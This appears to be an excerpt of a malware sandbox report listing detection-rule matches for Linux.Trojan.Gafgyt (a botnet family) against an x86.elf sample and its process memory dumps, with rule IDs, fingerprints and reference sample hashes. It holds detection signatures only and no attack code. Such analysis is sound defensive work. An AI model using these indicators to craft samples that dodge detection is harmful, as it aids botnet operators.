        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_859042a0 Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_859042a0 Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
        Source: Process Memory Space: x86.elf PID: 5528, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Process Memory Space: x86.elf PID: 5530, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Process Memory Space: x86.elf PID: 5531, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Contains symbols with names commonly found in malware
        Source: ELF static info symbol of initial sampleName: vseattack
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_859042a0 reference_sample = 41615d3f3f27f04669166fdee3996d77890016304ee87851a5f90804d6d4a0b0, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a27bcaa16edceda3dc5a80803372c907a7efd00736c7859c5a9d6a2cf56a8eec, id = 859042a0-a424-4c83-944b-ed182b342998, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_859042a0 reference_sample = 41615d3f3f27f04669166fdee3996d77890016304ee87851a5f90804d6d4a0b0, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a27bcaa16edceda3dc5a80803372c907a7efd00736c7859c5a9d6a2cf56a8eec, id = 859042a0-a424-4c83-944b-ed182b342998, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_859042a0 reference_sample = 41615d3f3f27f04669166fdee3996d77890016304ee87851a5f90804d6d4a0b0, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a27bcaa16edceda3dc5a80803372c907a7efd00736c7859c5a9d6a2cf56a8eec, id = 859042a0-a424-4c83-944b-ed182b342998, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
